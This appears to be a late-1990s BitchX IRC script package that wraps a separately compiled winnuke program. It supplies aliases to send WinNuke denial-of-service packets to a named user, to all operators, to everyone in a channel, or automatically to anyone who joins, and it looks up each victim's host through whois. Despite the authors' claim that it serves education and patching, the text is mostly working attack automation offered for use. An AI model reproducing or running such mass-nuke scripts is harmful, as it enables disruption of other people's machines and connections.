# WinNuke BitchX IRC script/wnuke package v 1.5 # Created by maddog and lerper # maddog@bitsmart.com, lerper@bitsmart.com # WinNuke IRCers with several options: # the nick you define # all of the ops in your current channel # anyone who joins a channel # everyone in the channel # Creditz: # goes out to _eci for winnuke # #BitchX for their great support # #ircII for pretending to be asleep whenever i asked for help # #hack for the laughs (hey--they were talking about vibrators last night) # Micro$oft for hosting the hacking channels on comic chat # KL and his LPLC LAX # shout outs to the L0pht and hey to memebers of "CdC" # notice: this package was created so more people could learn about winnuke # and more winblows users could patch themeslves up. # NOT so lame ircers could have their kicks #Before using this script, compile the included winnuke.c #cc -owinnuke winnuke.c should do the job! #If you have a GNU compiler...replace the cc with gcc #Then move the executable into your /usr/local/bin directory and #chmod it with the access levels you wish. assign wnuke_pgm wnuke assign wn [wnuke w/ mass nuke features] assign wi [winnuke commands] eval echo $wn version 1.5 loading... [ by: maddog and the lerper ] eval echo $wn type /whelp for commands alias whelp { eval echo $wi /wnuke - sends a win nuke to someone eval echo $wi /mwnuke - sends a win nuke to everyone on a chan eval echo $wi /awnuke - when someone joins, it nukes them too, effective with mwnuke eval echo $wi /opwnuke - sends a win nuke to all ops } alias wnuke { if ([$0]) { ^on ^311 "*" {^assign ndomain $3} ^on ^319 "*" # ^whois $0 wait EVAL ^exec winnuke $1 $ndomain >/dev/null & echo [wnuke] sent wnuke to $0 at $ndomain requested\. ^on 311 - "*" ^on 319 - "*" ^assign -ndomain } { echo echo Usage: /wnuke } } /on -join * {@joinvar=[$0]} alias awnuke { /on -join * {/wnuke $0}} alias mwnuke { fe ($chanusers()) blah { /wnuke $blah }} alias opwnuke { fe ($chops()) blah { /wnuke $blah }}